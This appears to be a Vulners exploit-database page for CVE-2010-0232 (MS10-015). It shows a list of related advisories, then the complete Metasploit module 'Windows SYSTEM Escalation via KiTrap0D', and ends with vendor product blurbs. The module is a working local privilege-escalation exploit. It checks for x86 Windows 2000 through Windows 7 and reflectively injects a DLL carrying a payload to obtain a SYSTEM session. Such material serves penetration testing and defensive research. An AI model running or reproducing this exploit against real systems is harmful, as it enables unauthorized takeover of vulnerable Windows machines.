| Reporter | Title | Published | Views | Family All 40 |
|---|---|---|---|---|
| Windows NT User Mode to Ring 0 Escalation Vulnerability | 19 Jan 201000:00 | – | zdt | |
| Windows SYSTEM Escalation Via KiTrap0D | 15 Nov 201300:00 | – | zdt | |
| CVE-2010-0232 | 21 Jan 201000:00 | – | attackerkb | |
| The vulnerability of the Windows operating system’s kernel allows attackers to enhance their privileges. | 4 Jul 202200:00 | – | bdu_fstec | |
| CVE-2010-0232 | 19 Jan 201000:00 | – | circl | |
| Microsoft Windows Kernel Exception Handler Vulnerability | 3 Mar 202200:00 | – | cisa_kev | |
| Update Protection against Windows Kernel Exception Handler Vulnerability (MS10-015) | 12 Feb 201000:00 | – | checkpoint_advisories | |
| Portable Executable (PE) 16-bit File (CVE-2010-0232; CVE-2011-2003) | 28 Feb 201000:00 | – | checkpoint_advisories | |
| CVE-2010-0232 | 21 Jan 201019:00 | – | cve | |
| CVE-2010-0232 | 21 Jan 201019:00 | – | cvelist |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows SYSTEM Escalation via KiTrap0D',
'Description' => %q{
This module will create a new session with SYSTEM privileges via the
KiTrap0D exploit by Tavis Ormandy. If the session in use is already
elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,
and is not supported on x64 editions of Windows.
},
'License' => MSF_LICENSE,
'Author' => [
'Tavis Ormandy', # Original resesarcher and exploit creator
'HD Moore', # Port of Tavis' code to meterpreter module
'Pusscat', # Port of Tavis' code to meterpreter module
'OJ Reeves' # Port of meterpreter code to a windows local exploit
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
[ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]
],
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2010-0232' ],
[ 'OSVDB', '61854' ],
[ 'MSB', 'MS10-015' ],
[ 'EDB', '11199' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2010/Jan/341' ]
],
'DisclosureDate' => '2010-01-19'
)
)
end
def check
# Validate platform architecture
if sysinfo['Architecture'] == ARCH_X64
return Exploit::CheckCode::Safe
end
# Validate OS version
version = get_version_info
unless version.build_number.between?(Msf::WindowsVersion::Win2000, Msf::WindowsVersion::Win7_SP1)
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
print_status('Reflectively injecting payload and triggering the bug...')
encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2010-0232', 'kitrap0d.x86.dll'),
encoded_payload
)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation